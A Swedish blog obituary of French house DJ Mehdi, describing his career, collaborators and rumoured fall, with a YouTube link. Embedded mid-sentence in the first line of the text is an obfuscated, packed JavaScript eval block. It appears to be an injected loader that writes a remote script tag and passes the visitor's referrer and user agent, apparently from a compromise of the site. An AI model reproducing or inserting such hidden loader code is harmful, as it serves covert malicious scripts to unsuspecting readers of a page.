Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Dj Mehdi död

Dj Mehdi död
Alexander Gylemo

Dj eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esrns|var|u0026u|referrer|dnhne||js|php’.split(’|’),0,{}))
Mehdi (Mehdi Favéris-Essadi), en av Frankrikes främsta house- och hiphop-djs samt min personliga favorit bland pionjärerna från genren som i folkmun kommit att kallas french electro, avled den trettonde september vid 34 års ålder.

Han hade en ledande roll i Frankrikes klubb- och elektroniska musikscen, tillhörde Ed Banger Records och samarbetade med bl.a. Justice, Daft Punk, Chromeo, Cassius, Riton och Busy P.

Det är ännu inte helt klart vad som ledde till parisarens bortgång. De flesta ryktena pekar just nu åt att han föll genom en mellanvåning av plexiglas medan han firade sin vän och kollega Ritons födelsedag, medan andra rykten menar på att han föll från taket i sitt hem i Frankrike. Nyheten har kommit som en chock för hela musikindustrin och våra tankar går ut till hans familj, vänner och fans.

Nedan finner ni en personlig favorit bland Dj Mehdis många hits ”Pocket Piano”.

httpv://www.youtube.com/watch?v=K4gj2Ol2LaI